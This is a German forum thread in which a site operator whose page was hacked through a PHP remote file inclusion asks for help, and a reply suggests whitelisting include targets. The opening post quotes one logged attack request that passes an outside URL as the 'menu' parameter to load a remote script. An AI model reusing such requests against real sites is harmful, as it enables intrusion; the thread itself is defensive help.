PHP Security

Hallo zusammen....

bin ganz neu hier, hoffe aber dennoch auf eure Hilfe. Kurz zu mir. Bin Olga und komme aus dem Raum Köln. Ich betreibe eine kleine Webseite, bzw. mache diese für einen Freund.

Habe ein akuteres Problem. Die Homepage ist von Hoster gesperrt worden, wegen einem unsicheren PHP Script...bzw. weil ich so ein schlechtes Script realisiert habe. Weiss eigentlich wo der Fehler ist, weiss aber nicht wie ich das mit php schnell umsetzten kann, der Hoster meinte...so lange das Script nicht sicher ist bleibt die Site offline...

Hier das Übel:
[28/Jan/2008:04:54:47 +0100] \"GET /index.php?menu=http://pc2you.ro/classes/phpmailer/config/tester.txt?

Darüber kam jemand rein und hat eien Bot gestartet.

Habe im INET gesucht...und gefunden das man in der php.ini allow_url_fopen deaktivieren könnte...dann wäre alles ok...das geht bei meinem Hoster nicht.
Könntet Ihr mir helfen mein Script anzupassen?

Hier das Script als Anhang....

Ich wäre Euch dankbar, wenn ihr mal drüberlesen könnt.

Grüsse
Olga

Variablen abfangen ist das Stichwort.

Wenn Links erlaubt sind:
php-faq.de/ch/ch-security.html

mfg

Zitat:

Original geschrieben von LittleGee
Variablen abfangen ist das Stichwort.

Wenn Links erlaubt sind:
php-faq.de/ch/ch-security.html

mfg

Hallo LittleGee,

hmm...danke erstmal für deinen Hilfeversuch...aber ich weiss nicht was du mir sagen willst...bzw wie ich das schaffen soll?

Grüsse
Olga

Naja so als kleine Anregung, in Bezug auf den Angriff.

Du könntest ja schonmal alles unterbinden was mit http:// beginnt oder ganz simpel definieren was es wirklich gibt, wenns nicht dynamisch sein soll.

PHP-Code:

$page = $_GET['menu'];
if ($page == "home")
{ include('home.inc.php'); }
elseif ($page == "infos")
{ include('infos.inc.php'); }
else
{ include('fehler.inc.php'); } 


mfg